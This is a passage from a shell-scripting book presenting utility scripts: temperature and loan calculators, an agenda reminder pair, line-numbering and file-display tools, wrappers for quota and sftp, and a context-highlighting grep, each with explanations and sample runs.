  K ) # Celsius = Kelvin - 273.15, then use Cels -> Fahr formula
    kelv=$temp
    cels="$(echo "scale=2; $kelv - 273.15" | bc)"
    farn="$(echo "scale=2; ((9/5) * $cels) + 32" | bc)"
esac

echo "Fahrenheit = $farn"
echo "Celsius    = $cels"
echo "Kelvin     = $kelv"

exit 0

Running the Script


I really like this script because I like the intuitive nature of the input format, even if it is pretty unusual for a Unix
command. Input is entered as a numeric value, with an optional suffix that indicates the units of the temperature
entered. To see the Celsius and Kelvin equivalents of the temperature 100 degrees Fahrenheit, enter 100F. To see
what 100 degrees Kelvin is equivalent to in Fahrenheit and Celsius, use 100K. If no unit suffix is entered, this script
works with Fahrenheit temperatures by default.
You'll see this same logical single-letter suffix approach again in Script #66, which converts currency values.
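The suffix parsing is just two complementary sed substitutions: one deletes the digits to leave the unit letter, the other deletes everything that isn't part of the number. Here's a standalone sketch using the script's own patterns (the input value is illustrative):

```shell
# Split an argument like "100c" into its numeric part and its uppercased
# unit letter, using the same sed expressions as convertatemp.
input="100c"
unit="$(echo $input | sed -e 's/[-[[:digit:]]*//g' | tr '[:lower:]' '[:upper:]')"
temp="$(echo $input | sed -e 's/[^-[[:digit:]]*//g')"
echo "$temp $unit"    # 100 C
```

The ${unit:=F} default in the case statement then supplies F whenever the user typed a bare number with no suffix at all.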

The Results
$ convertatemp 212
Fahrenheit = 212
Celsius    = 100.00
Kelvin     = 373.15
$ convertatemp 100C
Fahrenheit = 212.00
Celsius    = 100
Kelvin     = 373.15
$ convertatemp 100K
Fahrenheit = -279.67
Celsius    = -173.15
Kelvin     = 100

Hacking the Script


A few input flags that would generate a succinct output format suitable for use in other scripts would be a useful
addition to this script. Something like convertatemp -c 100f could output the Celsius equivalent of 100 degrees
Fahrenheit.

#29 Calculating Loan Payments


In addition to temperature conversion, another common calculation for your users might well deal with estimating the
size of loan payments. This script helps answer the question, "What can I do with that bonus?" at least when things
are going well.
While the formula to calculate payments based on the principal, interest rate, and duration of the loan is a bit tricky,
some judicious use of shell variables tames the beast and makes it surprisingly understandable too.

The Code
#!/bin/sh

# loancalc - Given a principal loan amount, interest rate, and
#   duration of loan (years), calculates the per-payment amount.

# Formula is:  M = P * ( J / (1 - (1 + J) ** -N ))
#   where P = principal, J = monthly interest rate, N = duration (months)
#
# Users typically enter P, I (annual interest rate), and L (length, years)

. script-library.sh

if [ $# -ne 3 ] ; then
  echo "Usage: $0 principal interest loan-duration-years" >&2
  exit 1
fi

P=$1
I=$2
L=$3

J="$(scriptbc -p 8 $I / \( 12 \* 100 \) )"
N="$(( $L * 12 ))"
M="$(scriptbc -p 8 $P \* \( $J / \( 1 - \( 1 + $J \) \^ -$N \) \) )"

# Now a little prettying up of the value:

dollars="$(echo $M | cut -d. -f1)"
cents="$(echo $M | cut -d. -f2 | cut -c1-2)"

cat << EOF
A $L year loan at $I% interest with a principal amount of $(nicenumber $P 1)
results in a payment of \$$dollars.$cents each month for the duration of
the loan ($N payments).
EOF

exit 0

Running the Script


This minimalist script expects three parameters to be specified: the amount of the loan, the interest rate, and the
duration of the loan (in years).

The Results
I've been eyeing a lovely new Volvo XC90, and I'm curious how much my payments would be if I bought the car. The
Volvo is about $40,000 out the door, and the latest interest rates are running at 6.75 percent for an auto loan. I'd like
to see how much difference there is in total payments between a four-year and five-year car loan. Easily done:
$ loancalc 40000 6.75 4
A 4 year loan at 6.75% interest with a principal amount of 40,000
results in a payment of $953.21 each month for the duration of
the loan (48 payments).
$ loancalc 40000 6.75 5
A 5 year loan at 6.75% interest with a principal amount of 40,000
results in a payment of $787.33 each month for the duration of
the loan (60 payments).

If I can afford the slightly higher payments on the four-year loan, the car will be paid off and the overall amount of the
loan (payment * number of payments) will be significantly cheaper. To calculate the exact savings, I can use Script #24,
the interactive calculator:
$ calc '(787.33 * 60) - (953.21 * 48)'
1485.72
This seems like a worthwhile savings. $1,485.72 would buy a nice little laptop!

Hacking the Script


Exploring the formula itself is beyond the scope of this book, but it's worth noting how even a complex mathematical
formula can be implemented directly in a shell script.
The entire calculation could be solved using a single input stream to bc, because that program also supports variables.
However, manipulating the intermediate values within the script itself is beyond the capabilities of the
bc command alone. For an example of just such a manipulation, here is the code that splits the resultant monthly
payment value and ensures that it's presented as a properly formatted monetary value:
dollars="$(echo $M | cut -d. -f1)"
cents="$(echo $M | cut -d. -f2 | cut -c1-2)"
As it does in so many scripts in this book, the cut command proves tremendously useful here. The second line of this
code grabs the portion of the monthly payment value that follows the decimal point and then chops off anything after
the second character. Ideally, this modification would round up or down according to the value of the third cents
character, rather than performing what is effectively a floor function. And this change is surprisingly easy to accomplish:
Just add 0.005 (half a cent) to the value before truncating the cents amount at two digits.
This script could also really do with a way to prompt for each field if no parameters are specified. And a more
sophisticated and useful version of this script would let a user specify any three parameters of the four (principal,
interest rate, number of payments, and monthly payment amount) and have the script solve for the fourth value. That
way, if you knew you could afford only $500 per month in payments, and that the maximum duration of a 6 percent
auto loan was five years, you could ascertain the largest amount of principal that you could borrow.

#30 Keeping Track of Events


This script is actually two scripts that implement a simple calendar program. The first script, addagenda, enables you
to specify either the day of the week or the day and month for recurring events, or the day, month, and year for
one-time events. All the dates are validated and saved, along with a one-line event description, in an .agenda file in your
home directory. The second script, agenda, checks all known events, showing which are scheduled for the current
date.
I find this kind of tool particularly useful for remembering birthdays and anniversaries. It saves me a lot of grief!

The Code
#!/bin/sh

# addagenda - Prompts the user to add a new event for the agenda script.

agendafile="$HOME/.agenda"

isDayName()
{
  # return = 0 if all is well, 1 on error

  case $(echo $1 | tr '[[:upper:]]' '[[:lower:]]') in
    sun*|mon*|tue*|wed*|thu*|fri*|sat*) retval=0 ;;
    * ) retval=1 ;;
  esac
  return $retval
}

isMonthName()
{
  case $(echo $1 | tr '[[:upper:]]' '[[:lower:]]') in
    jan*|feb*|mar*|apr*|may*|jun*)
      return 0 ;;
    jul*|aug*|sep*|oct*|nov*|dec*)
      return 0 ;;
    * ) return 1 ;;
  esac
}

normalize()
{
  # Return string with first char uppercase, next two lowercase

  echo -n $1 | cut -c1 | tr '[[:lower:]]' '[[:upper:]]'
  echo $1 | cut -c2-3 | tr '[[:upper:]]' '[[:lower:]]'
}

if [ ! -w $HOME ] ; then
  echo "$0: cannot write in your home directory ($HOME)" >&2
  exit 1
fi

echo "Agenda: The Unix Reminder Service"
echo -n "Date of event (day mon, day month year, or dayname): "
read word1 word2 word3 junk

if isDayName $word1 ; then

  if [ ! -z "$word2" ] ; then
    echo "Bad dayname format: just specify the day name by itself." >&2
    exit 1
  fi
  date="$(normalize $word1)"

else

  if [ -z "$word2" ] ; then
    echo "Bad dayname format: unknown dayname specified" >&2
    exit 1
  fi

  if [ ! -z "$(echo $word1|sed 's/[[:digit:]]//g')" ] ; then
    echo "Bad date format: please specify day first, by day number" >&2
    exit 1
  fi

  if [ "$word1" -lt 1 -o "$word1" -gt 31 ] ; then
    echo "Bad date format: day number can only be in range 1-31" >&2
    exit 1
  fi

  if ! isMonthName $word2 ; then
    echo "Bad date format: unknown month name specified." >&2
    exit 1
  fi

  word2="$(normalize $word2)"

  if [ -z "$word3" ] ; then
    date="$word1$word2"
  else
    if [ ! -z "$(echo $word3|sed 's/[[:digit:]]//g')" ] ; then
      echo "Bad date format: third field should be year." >&2
      exit 1
    elif [ $word3 -lt 2000 -o $word3 -gt 2500 ] ; then
      echo "Bad date format: year value should be 2000-2500" >&2
      exit 1
    fi
    date="$word1$word2$word3"
  fi
fi

echo -n "One-line description: "
read description

# Ready to write to data file

echo "$(echo $date|sed 's/ //g')|$description" >> $agendafile

exit 0
The second script is shorter but is used more often:
#!/bin/sh

# agenda - Scans through the user's .agenda file to see if there
#          are any matches for the current or next day.

agendafile="$HOME/.agenda"

checkDate()
{
  # Create the possible default values that'll match today

  weekday=$1
  day=$2
  month=$3
  year=$4

  format1="$weekday"
  format2="$day$month"
  format3="$day$month$year"

  # and step through the file comparing dates...

  IFS="|"       # the reads will naturally split at the IFS

  echo "On the Agenda for today:"

  while read date description ; do
    if [ "$date" = "$format1" -o "$date" = "$format2" -o "$date" = "$format3" ]
    then
      echo "  $description"
    fi
  done < $agendafile
}

if [ ! -e $agendafile ] ; then
  echo "$0: You don't seem to have an .agenda file. " >&2
  echo "To remedy this, please use 'addagenda' to add events" >&2
  exit 1
fi

# Now let's get today's date...

eval $(date "+weekday=\"%a\" month=\"%b\" day=\"%e\" year=\"%G\"")

day="$(echo $day|sed 's/ //g')"   # remove possible leading space

checkDate $weekday $day $month $year

exit 0

How It Works
The agenda script supports three types of recurring events: weekly events (e.g., every Wednesday), annual events
(e.g., every August 3), and one-time events (e.g., 1 January, 2010). As entries are added to the agenda file, their
specified dates are normalized and compressed so that 3 August becomes 3Aug, and Thursday becomes Thu. This is
accomplished with the normalize function:
normalize()
{
  # Return string with first char uppercase, next two lowercase
  echo -n $1 | cut -c1 | tr '[[:lower:]]' '[[:upper:]]'
  echo $1 | cut -c2-3 | tr '[[:upper:]]' '[[:lower:]]'
}
This chops any value entered down to three characters, ensuring that the first is uppercase and the second and third
are lowercase. This format matches the standard abbreviated day and month name values in the date command's
output, which is critical for the correct functioning of the agenda script.
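To see the normalization in action, you can paste the function into a shell and feed it a few sample values (the inputs here are arbitrary):

```shell
normalize()
{
  # Return string with first char uppercase, next two lowercase
  echo -n $1 | cut -c1 | tr '[[:lower:]]' '[[:upper:]]'
  echo $1 | cut -c2-3 | tr '[[:upper:]]' '[[:lower:]]'
}

normalize august      # -> Aug
normalize THURSDAY    # -> Thu
normalize wed         # -> Wed
```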
The agenda script checks for events by taking the current date and transforming it into the three possible date string
formats (dayname, day+month, and day+month+year). It then simply compares each of these date strings to each line
in the .agenda data file. If there's a match, that event is shown to the user. While long, the addagenda script has
nothing particularly complex happening in it.
In my opinion, the coolest hack is how an eval is used to assign variables to each of the four date values needed:
eval $(date "+weekday=\"%a\" month=\"%b\" day=\"%e\" year=\"%G\"")
It's also possible to extract the values one by one (for example, weekday="$(date +%a)"), but in very rare cases
this method can fail if the date rolls over to a new day in the middle of the four date invocations, so a succinct single
invocation is preferable. In either case, unfortunately, date returns a day number with either a leading zero or a
leading space, neither of which is desired. So the line of code immediately following the line just shown strips the
leading space from the value, if present, before proceeding.
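Here's that trick in isolation, populating all four variables with a single date invocation:

```shell
# One date call assigns four shell variables at once; eval re-parses
# the output (weekday="Thu" month="Apr" day=" 3" year="2025" or similar).
eval $(date "+weekday=\"%a\" month=\"%b\" day=\"%e\" year=\"%G\"")

day="$(echo $day | sed 's/ //g')"   # strip the possible leading space from %e

echo "weekday=$weekday month=$month day=$day year=$year"
```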

Running the Script


The addagenda script prompts the user for the date of a new event. Then, if it accepts the date format, the script
prompts for a one-line description of the event.
The companion agenda script has no parameters and, when invoked, produces a list of all events scheduled for the
current date.

The Results
To see how this pair of scripts works, let's add a number of new events to the database:
$ addagenda
Agenda: The Unix Reminder Service
Date of event (day mon, day month year, or dayname): 31 October
One-line description: Halloween
$ addagenda
Agenda: The Unix Reminder Service
Date of event (day mon, day month year, or dayname): 30 March
One-line description: Penultimate day of March
$ addagenda
Agenda: The Unix Reminder Service
Date of event (day mon, day month year, or dayname): Sunday
One-line description: sleep late (hopefully)
$ addagenda
Agenda: The Unix Reminder Service
Date of event (day mon, day month year, or dayname): marc 30 03
Bad date format: please specify day first, by day number
$ addagenda
Agenda: The Unix Reminder Service
Date of event (day mon, day month year, or dayname): 30 march 2003
One-line description: IM Marv to see about dinner
Now the agenda script offers a quick and handy reminder of what's happening today:
$ agenda
On the Agenda for today:
  Penultimate day of March
  sleep late (hopefully)
  IM Marv to see about dinner
Notice that it matched entries formatted as day+month, day of week, and day+month+year. For completeness, here's
the associated .agenda file, with a few additional entries:
$ cat ~/.agenda
14Feb|Valentine's Day
25Dec|Christmas
3Aug|Dave's Birthday
4Jul|Independence Day (USA)
31Oct|Halloween
30Mar|Penultimate day of March
Sun|sleep late (hopefully)
30Mar2003|IM Marv to see about dinner

Hacking the Script


This script really just scratches the surface of this complex and interesting topic. It'd be nice to have it look a few days
ahead, for example, which can be accomplished in the agenda script by doing some date math. If you have the GNU
date command, date math (e.g., today + 2 days) is easy. If you don't, well, it requires quite a complex script to
enable date math solely in the shell.
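With GNU date, for instance, generating tomorrow's matchable strings takes one invocation per format. Note that the -d option and the %-d padding modifier are GNU extensions (an assumption about your system), so this sketch won't run on a stock BSD or Solaris date:

```shell
# Build the three agenda-style date strings for tomorrow (GNU date only).
weekday="$(date -d '+1 day' +%a)"
daymonth="$(date -d '+1 day' +%-d%b)"        # %-d suppresses padding, e.g. 3Aug
daymonthyear="$(date -d '+1 day' +%-d%b%G)"  # e.g. 3Aug2025

echo "$weekday $daymonth $daymonthyear"
```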
Another, perhaps easier hack would be to have agenda output Nothing scheduled for today when there are no
matches for the current date, rather than On the Agenda for today: and no further output.
Note that this script could also be used on a Unix box for sending out systemwide reminders about events like backup
schedules, company holidays, and employee birthdays. Simply have the agenda script on each user's machine point
to a shared read-only .agenda file, and then add a call to the agenda script in each user's .login or similar file.

Chapter 4: Tweaking Unix


Overview
The outsider view of Unix suggests a nice, uniform command-line experience, helped along by the existence of and
compliance with the POSIX standards for Unix. But anyone who's ever touched more than one computer knows how
much they can vary within these broad parameters.
You'd be hard-pressed to find a Unix or Linux box that doesn't have ls as a standard command, for example, but
does your version support the --color flag? Does your system use the older inetd package for launching
daemons, or does it use xinetd? Does your version of the Bourne shell support variable slicing (e.g.,
${var:0:2})?
Perhaps one of the most valuable uses of shell scripts is to fix your particular flavor of Unix and make it more like other
flavors, in order to make your commands conform with those of different systems. Although most of the modern, fully
featured GNU utilities run just fine on non-Linux Unixes (so you can replace clunky old tar binaries with the newer
GNU tar, for example), many times the system updates involved in tweaking Unix don't need to be so drastic and
don't need to introduce the potential problems inherent in adding new binaries to a supported system. Instead, shell
scripts can be used to map popular flags to their local equivalents, to use core Unix capabilities to create a smarter
version of an existing command, or even to address the longtime lack of a certain facility.
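A quick way to answer that slicing question on any given box is simply to try the expression under the shell in question; a sketch, invoking bash explicitly here (the presence of bash is an assumption):

```shell
# Does this shell support ${var:offset:length} slicing? bash and ksh93 do;
# a strict POSIX /bin/sh may not.
bash -c 'var="wicked"; echo "${var:0:2}"'    # prints wi
```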

#31 Displaying a File with Line Numbers


There are a lot of ways to add line numbers to a displayed file, many of which are quite short. Here's a solution using
awk:
awk '{ print NR": "$0 }' < inputfile
On some Unix implementations, the cat command has an -n flag, and on others, the more (or less, or pg) pager
has a flag for specifying that each line of output should be numbered. But on some Unixes, none of these will work, in
which case the simple script given here can do the job.

The Code
#!/bin/sh

# numberlines - A simple alternative to cat -n, etc.

for filename
do
  linecount="1"
  while read line
  do
    echo "${linecount}: $line"
    linecount="$(($linecount + 1))"
  done < $filename
done

exit 0

Running the Script


You can feed as many filenames as you want to this script, but you can't feed it input via a pipe, though that wouldn't
be too hard to fix, if needed.

The Results
$ numberlines text.snippet.txt
1: Perhaps one of the most valuable uses of shell scripts is to fix
2: your particular flavor of Unix and make it more like other flavors,
3: to bring your commands into conformance or to increase consistency
4: across different systems. The outsider view of Unix suggests a
5: nice, uniform command-line experience, helped along by the existence
6: of and compliance with the POSIX standards for Unix. But anyone who's
7: ever touched more than one computer knows how much they can vary
8: within these broad parameters.

Hacking the Script


Once you have a file with numbered lines, you can also reverse the order of all the lines in the file:
cat -n filename | sort -rn | cut -c8-
This does the trick on systems supporting the -n flag to cat, for example. Where might this be useful? One obvious
situation is when displaying a log file in most-recent-to-least-recent order.
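For example, given a three-line file, the pipeline emits the lines in reverse order (cut -c8- strips the six-character number field and the tab that cat -n prepends):

```shell
printf 'first\nsecond\nthird\n' > /tmp/rev.$$

# Number the lines, sort numerically in reverse, then strip the numbers.
cat -n /tmp/rev.$$ | sort -rn | cut -c8-
# third
# second
# first

rm -f /tmp/rev.$$
```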

#32 Displaying a File with Additional Information


Many of the most common Unix commands have evolved within slow-throughput, expensive output environments and
therefore offer minimal output and interactivity. An example is cat: When used to view a short file, it really doesn't
have much helpful output. It would be nice to have more information about the file. This script, a more sophisticated
variation of Script #31, accomplishes this.

The Code
#!/bin/sh

# showfile - Shows the contents of a file, including additional useful info.

width=72

for input
do
  lines="$(wc -l < $input | sed 's/ //g')"
  chars="$(wc -c < $input | sed 's/ //g')"
  owner="$(ls -ld $input | awk '{print $3}')"

  echo "-----------------------------------------------------------------"
  echo "File $input ($lines lines, $chars characters, owned by $owner):"
  echo "-----------------------------------------------------------------"
  while read line
  do
    if [ ${#line} -gt $width ] ; then
      echo "$line" | fmt | sed -e '1s/^/  /' -e '2,$s/^/+ /'
    else
      echo "  $line"
    fi
  done < $input

  echo "-----------------------------------------------------------------"
done | more

exit 0

How It Works
To simultaneously read the input line by line and add head and foot information, this script uses a handy shell trick:
Near the end of the script it redirects the input to the while loop with the snippet done < $input. Perhaps the
most complex element in this script, however, is the invocation of sed for lines longer than the specified length:
echo "$line" | fmt | sed -e '1s/^/  /' -e '2,$s/^/+ /'
Lines greater than the maximum allowable length are wrapped with fmt (or its shell script replacement, Script #14). To
visually denote which lines are wrapped continuations and which are retained intact from the original file, the first line of
wrapped output has the usual two-space indent, but subsequent wrapped lines are prefixed with a plus sign and a
single space instead. Finally, the more program displays the results.
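To watch the marking behavior on its own, feed one overlong line through the same pipeline. The -w flag here narrows fmt's width just for demonstration (the script itself relies on fmt's default):

```shell
line="This deliberately overlong line of sample text will be wrapped by fmt into several shorter pieces."

# First output line gets the two-space indent; each continuation
# line produced by the wrap is prefixed with "+ ".
echo "$line" | fmt -w 40 | sed -e '1s/^/  /' -e '2,$s/^/+ /'
```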

Running the Script


As with the previous script, you can run showfile simply by specifying one or more filenames when the program is
invoked.

The Results
$ showfile ragged.txt
-----------------------------------------------------------------
File ragged.txt (7 lines, 639 characters, owned by taylor):
-----------------------------------------------------------------
  So she sat on, with closed eyes, and half believed herself in
  Wonderland, though she knew she had but to open them again, and
  all would change to dull reality--the grass would be only rustling
+ in the wind, and the pool rippling to the waving of the reeds--the
  rattling teacups would change to tinkling sheep-bells, and the
  Queen's shrill cries to the voice of the shepherd boy--and the
  sneeze
  of the baby, the shriek of the Gryphon, and all the other queer
+ noises, would change (she knew) to the confused clamour of the busy
+ farm-yard--while the lowing of the cattle in the distance would
+ take the place of the Mock Turtle's heavy sobs.
-----------------------------------------------------------------

#33 Wrapping Only Long Lines


One limitation of the fmt command and its shell script equivalent, Script #14, is that they wrap and fill everything they
encounter, whether it makes sense to do so or not. This can mess up email (wrapping your .signature is not
good, for example) and many other input file formats.
What if you have a document in which you want to wrap just the long lines but leave everything else intact? With the
default set of commands available to a Unix user, there's only one possible way to accomplish this: Explicitly step
through each line in an editor, feeding the long ones to fmt one by one (for example, in vi you could move the cursor
onto the line in question and then use !$fmt to accomplish this).
Yet Unix has plenty of tools that can be combined to accomplish just what we seek. For example, to quickly scan a file
to see if any lines are too long:
awk '{ if (length($0) > 72) { print $0 } }'
A more interesting path to travel, however, is to use the ${#varname} construct in the shell, which returns the length
of the contents of whatever variable is substituted for varname.

The Code
#!/bin/sh

# toolong - Feeds the fmt command only those lines in the input stream that are
#           longer than the specified length.

width=72

if [ ! -r "$1" ] ; then
  echo "Usage: $0 filename" >&2 ; exit 1
fi

while read input
do
  if [ ${#input} -gt $width ] ; then
    echo "$input" | fmt
  else
    echo "$input"
  fi
done < $1

exit 0

How It Works
The method of processing the input file in this script is interesting. Notice that the file is fed to the while loop with a
simple < $1 and that each line can then be analyzed by reading it with read input, which assigns the input
variable to each line of the file.
If your shell doesn't have the ${#var} notation, you can emulate its behavior with wc:
varlength="$(echo "$var" | wc -c)"
However, wc has a very annoying habit of prefacing its output with spaces to get values to align nicely in the output
listing. To sidestep that pesky problem, a slight modification, which lets only digits through the final pipe step, is
necessary:
varlength="$(echo "$var" | wc -c | sed 's/[^[:digit:]]//g')"
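One caveat with the wc emulation, worth noting: echo appends a newline and wc -c counts it, so this version reports one more than ${#var} does. Using printf instead of echo (or subtracting 1) brings the counts back into agreement:

```shell
var="hello"

echo "${#var}"                                         # -> 5

# wc -c also counts the newline that echo appends:
echo "$var" | wc -c | sed 's/[^[:digit:]]//g'          # -> 6

# printf emits no trailing newline, matching ${#var}:
printf '%s' "$var" | wc -c | sed 's/[^[:digit:]]//g'   # -> 5
```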

Running the Script


This script accepts exactly one filename as its input.

The Results
$ toolong ragged.txt
So she sat on, with closed eyes, and half believed herself in
Wonderland, though she knew she had but to open them again, and
all would change to dull reality--the grass would be only rustling
in the wind, and the pool rippling to the waving of the reeds--the
rattling teacups would change to tinkling sheep-bells, and the
Queen's shrill cries to the voice of the shepherd boy--and the
sneeze
of the baby, the shriek of the Gryphon, and all the other queer
noises, would change (she knew) to the confused clamour of the busy
farm-yard--while the lowing of the cattle in the distance would
take the place of the Mock Turtle's heavy sobs.
Notice that, unlike a standard invocation of fmt, toolong has retained line breaks where possible, so the word
"sneeze," which is on a line by itself in the input file, is also on a line by itself in the output.

#34 Emulating GNU-Style Flags with Quota


The inconsistency between the command flags of various Unix systems is a perpetual problem and causes lots of grief
for users who switch between any of the major releases, particularly between a commercial Unix (Solaris, HP-UX, and
so on) and an open source Linux system. One command that demonstrates this problem is quota, which supports
full-word flags on some Unix systems, while on others it accepts only one-letter flags.
A succinct shell script solves the problem, however, by mapping any full-word flags specified into the equivalent
single-letter alternatives:
#!/bin/sh

# newquota - A front end to quota that works with full-word flags a la GNU.

# quota has three possible flags, -g, -v, and -q, but this script
# allows them to be '--group', '--verbose', and '--quiet' too:

flags=""
realquota="/usr/bin/quota"

while [ $# -gt 0 ]
do
  case $1
  in
    --help )              echo "Usage: $0 [--group --verbose --quiet -gvq]" >&2
                          exit 1 ;;
    --group | -group)     flags="$flags -g";   shift ;;
    --verbose | -verbose) flags="$flags -v";   shift ;;
    --quiet | -quiet)     flags="$flags -q";   shift ;;
    --)                   shift;   break ;;
    * )                   break;   # done with 'while' loop!
  esac
done

exec $realquota $flags "$@"

How It Works
Did you notice that this script accepts both single- and double-dash prefixes for full words, making it actually a bit more
flexible than the standard open source version, which insists on a single dash for one-letter flags and a double dash
for full-word flags? With wrappers, the sky's the limit in terms of improved usability and increased consistency across
commands.

Running the Script


There are a couple of ways to integrate a wrapper of this nature into your system. The most obvious is to rename the
base quota command, rename this script quota, and then change the value of the realquota variable set at the
beginning of the script. But you can also ensure that users have a PATH that looks in local directories before it looks in
the standard Unix binary distro directories (e.g., /usr/local/bin before /bin and /usr/bin), which relies on
the safe assumption that each user's PATH will see the script before it sees the real command. A third way is to add
systemwide aliases so that a user typing quota actually invokes the newquota script.
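As a sketch of that third approach, a systemwide shell startup file could carry a single alias line. Both the startup file location and the install path for the wrapper are assumptions here; they vary by shell and distribution:

```shell
# In /etc/profile.d/newquota.sh or a similar systemwide startup file
# (path is an assumption), so every interactive shell picks it up:
alias quota='/usr/local/bin/newquota'
```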

The Results
$ newquota --verbose
Disk quotas for user dtint (uid 24810):
     Filesystem   usage   quota   limit   grace   files   quota   limit   grace
           /usr  338262  614400  675840           10703  120000  126000
$ newquota -quiet

The -q (quiet) mode emits output only if the user is over quota. You can see that this is working correctly from the last
result because I'm not over quota.

#35 Making sftp Look More Like ftp


The secure version of the file transfer protocol ftp program is included as part of ssh, the secure shell package, but
its interface can be a bit confusing for users who are making the switch from the crusty old ftp client. The basic
problem is that ftp is invoked as ftp remotehost, and it then prompts for account and password information. By
contrast, sftp wants to know the account and remote host on the command line and won't work properly (or as
expected) if only the host is specified.
To address this, a simple wrapper script allows users to invoke mysftp exactly as they would have invoked the ftp
program, using prompts for any needed fields.

The Code
#!/bin/sh

# mysftp - Makes sftp start up more like ftp.

echo -n "User account: "
read account

if [ -z $account ] ; then
  exit 0;   # changed their mind, presumably
fi

if [ -z "$1" ] ; then
  echo -n "Remote host: "
  read host
  if [ -z $host ] ; then
    exit 0
  fi
else
  host=$1
fi

# End by switching to sftp. The -C flag enables compression here.

exec /usr/bin/sftp -C $account@$host

Running the Script


As with the ftp client, if users omit the remote host, the script continues by prompting for a remote host, but if the script
is invoked as mysftp remotehost, the remotehost provided is used instead.

The Results
First off, what happens if you invoke sftp without any arguments?
$ sftp
usage: sftp [-vC1] [-b batchfile] [-o option] [-s subsystem|path] [-B buffer_size]
            [-F config] [-P direct server path] [-S program]
            [user@]host[:file [file]]
Useful, but confusing. By contrast, invoke this script without any arguments and you can proceed to make an actual
connection:
$ mysftp
User account: taylor
Remote host: intuitive.com
Connecting to intuitive.com...
taylor@intuitive.com's password:
sftp> quit
Invoke the script as if it were an ftp session by supplying the remote host, and it'll prompt for the remote account
name and then invisibly invoke sftp:
$ mysftp intuitive.com
User account: taylor
Connecting to intuitive.com...
taylor@intuitive.com's password:
sftp> quit

Hacking the Script


There's a trick in this script worth mentioning: The last line is an exec call. What this does is replace the currently
running shell with the application specified. Because you know there's nothing left to do after calling the sftp
command, this method of ending our script is more efficient than having the shell hang around waiting for sftp to
end.
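The effect is easy to demonstrate with a throwaway subshell: once exec runs, nothing after it in the script is ever reached, because the shell process itself has been replaced.

```shell
# The second echo never runs; exec replaces the shell with the first echo.
sh -c 'exec echo "replaced the shell"; echo "never printed"'
# replaced the shell
```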
We'll revisit the sftp command in Script #83, to see how it can be used to securely and automatically synchronize a
local and remote directory.

#36 Fixing grep


Some versions of grep offer a remarkable variety of capabilities, including the particularly useful ability to show the
context (a line or two above and below) of a matching line in the file. Additionally, some rare versions of grep can
highlight the region in the line (for simple patterns, at least) that matches the specified pattern.
Both of these useful features can be emulated in a shell script, so that even users on older commercial Unixes with
relatively primitive grep commands can enjoy them. This script also borrows from the ANSI color script, Script #11.

The Code
#!/bin/sh

# cgrep - grep with context display and highlighted pattern matches.

context=0
esc="^["   # a literal ESC character, not caret + bracket
bOn="${esc}[1m"   bOff="${esc}[22m"
sedscript="/tmp/cgrep.sed.$$"
tempout="/tmp/cgrep.$$"

function showMatches
{
  matches=0

  echo "s/$pattern/${bOn}$pattern${bOff}/g" > $sedscript

  for lineno in $(grep -n "$pattern" $1 | cut -d: -f1)
  do
    if [ $context -gt 0 ] ; then
      prev="$(($lineno - $context))"
      if [ "$(echo $prev | cut -c1)" = "-" ] ; then
        prev="0"
      fi
      next="$(($lineno + $context))"

      if [ $matches -gt 0 ] ; then
        echo "${prev}i\\" >> $sedscript
        echo "----" >> $sedscript
      fi
      echo "${prev},${next}p" >> $sedscript
    else
      echo "${lineno}p" >> $sedscript
    fi
    matches="$(($matches + 1))"
  done

  if [ $matches -gt 0 ] ; then
    sed -n -f $sedscript $1 | uniq | more
  fi
}

trap "/bin/rm -f $tempout $sedscript" EXIT

if [ -z "$1" ] ; then
  echo "Usage: $0 [-c X] pattern {filename}" >&2 ; exit 0
fi

if [ "$1" = "-c" ] ; then
  context="$2"
  shift ; shift
elif [ "$(echo $1|cut -c1-2)" = "-c" ] ; then
  context="$(echo $1|cut -c3-)"
  shift
fi

pattern="$1" ; shift

if [ $# -gt 0 ] ; then
  for filename ; do
    echo "----- $filename -----"
    showMatches $filename
  done
else
  cat - > $tempout    # save stream to a temp file
  showMatches $tempout
fi

exit 0

How It Works
This script uses grep -n to get the line numbers of all matching lines in the file and then, using the specified number
of lines of context to include, identifies a starting and ending line for displaying each match. These are written out to
the temporary sed script, along with a word substitution command (the very first echo statement in the
showMatches function) that wraps the specified pattern in bold-on and bold-off ANSI sequences. That's 90 percent
of the script, in a nutshell.
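The line-number harvesting at the heart of showMatches is just this grep -n pipeline; on a small sample file:

```shell
printf 'alpha\nbeta\nalpha again\ngamma\n' > /tmp/sample.$$

# grep -n prefixes each match with its line number and a colon;
# cut keeps only the number.
grep -n "alpha" /tmp/sample.$$ | cut -d: -f1
# 1
# 3

rm -f /tmp/sample.$$
```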

Running the Script


This script works either with an input stream (in which case it saves the input to a temp file and then processes the
temp file as if its name had been specified on the command line) or with a list of one or more files on the command
line. To specify the number of lines of context both above and below the line matching the pattern that you specified,
use -c value, followed by the pattern to match.

The Results
$ cgrep -c 1 teacup ragged.txt
----- ragged.txt -----
in the wind, and the pool rippling to the waving of the reeds--the
rattling teacups would change to tinkling sheep-bells, and the
Queen's shrill cries to the voice of the shepherd boy--and the

Hacking the Script


A useful refinement to this script would be to return line numbers along with the matched lines.
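One way to build that refinement (a sketch of my own, not the book's code) uses sed's = command, which prints the current input line number on its own line. Changing the generated commands from "${lineno}p" to "${lineno}{=;p;}" would prefix each match with its line number:

```sh
# Demonstration with a throwaway file: the '=' command emits the line
# number, then 'p' prints the matching line itself.
printf 'alpha\nteacup\ngamma\n' > /tmp/cgrepdemo.txt
sed -n '2{=;p;}' /tmp/cgrepdemo.txt    # prints "2" then "teacup"
rm -f /tmp/cgrepdemo.txt
```

A fancier version could merge the number and the line onto one row with a second sed or awk pass.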

#37 Working with Compressed Files


Throughout the years of Unix development, few programs have been reconsidered and redeveloped more times than
compress. On most Linux systems there are three significantly different compression programs available:
compress, gzip, and bzip2. Each has a different suffix, .Z, .gz, and .bz2, respectively, and the degree of
compression of the results can vary among the three programs, depending on the layout of data within a file.
Regardless of the level of compression, and regardless of which compression programs are installed, working with
compressed files on many Unix systems requires uncompressing them by hand, accomplishing the desired tasks, and
recompressing them when finished. A perfect job for a shell script!

The Code
#!/bin/sh

# zcat, zmore, and zgrep - This script should be either symbolically
#   linked or hard linked to all three names - it allows users to work with
#   compressed files transparently.

Z="compress"  ; unZ="uncompress"  ; Zlist=""
gz="gzip"     ; ungz="gunzip"     ; gzlist=""
bz="bzip2"    ; unbz="bunzip2"    ; bzlist=""

# First step is to try and isolate the filenames in the command line.
# We'll do this lazily by stepping through each argument, testing to
# see if it's a filename or not. If it is, and it has a compression
# suffix, we'll uncompress the file, rewrite the filename, and proceed.
# When done, we'll recompress everything that was uncompressed.

for arg
do
